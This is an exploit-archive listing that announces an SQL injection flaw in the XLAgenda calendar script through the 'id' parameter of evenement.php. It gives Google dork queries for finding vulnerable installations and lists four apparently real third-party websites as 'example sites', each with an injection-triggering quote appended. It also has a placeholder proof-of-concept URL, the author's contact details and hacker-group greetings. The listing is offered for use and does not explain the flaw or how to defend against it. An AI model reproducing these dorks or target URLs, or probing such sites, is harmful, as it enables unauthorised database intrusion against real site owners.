XLAgenda - SQL Injection Vulnerability



EKU-ID: 1982 CVE: OSVDB-ID:
Author: ShinoBi-Dz Published: 2012-04-23 Verified: Verified
Download:

Rating

☆☆☆☆☆
Home


#########################################################################
# Exploit Title: [ XLAgenda - SQL Injection Vulnerability ]                
# Date: [21-04-2012]                                                   
# Author: [ShinoBi-Dz]                                                  
# Software Link: http://xavier.lequere.net/xlagenda/                 
# E-mail : ShinoBiDz442@gmail.com                                      
# Facebook : https://www.facebook.com/shinobi.benz                     
# Category: [webapps]                                                   
# Google dork: inurl:"/xlagenda/evenement.php=id"                      
#              intext:"powered by XLAgenda" inurl:"/evenement.php=id"  
# Tested on: [Windows 7 ]                                              
#########################################################################

Example Sites :
http://www.stefoy-les-lyon.catholique.fr/xlagenda327/evenement.php?id=2556'
http://www.cefedem-normandie.com/xlagenda/evenement.php?id=2769'
http://www.amiens-sub.com/xlagenda403/evenement.php?id=86'
http://www.cineyexpo.be/agenda/evenement.php?id=208'


[~]Exploit/p0c :
http://www.site.com/xlagenda/evenement.php?id=[sqli]


Greetz [ Inj3ct0r - KedAns-Dz - HMD houmti442 - All Hacker's ALG]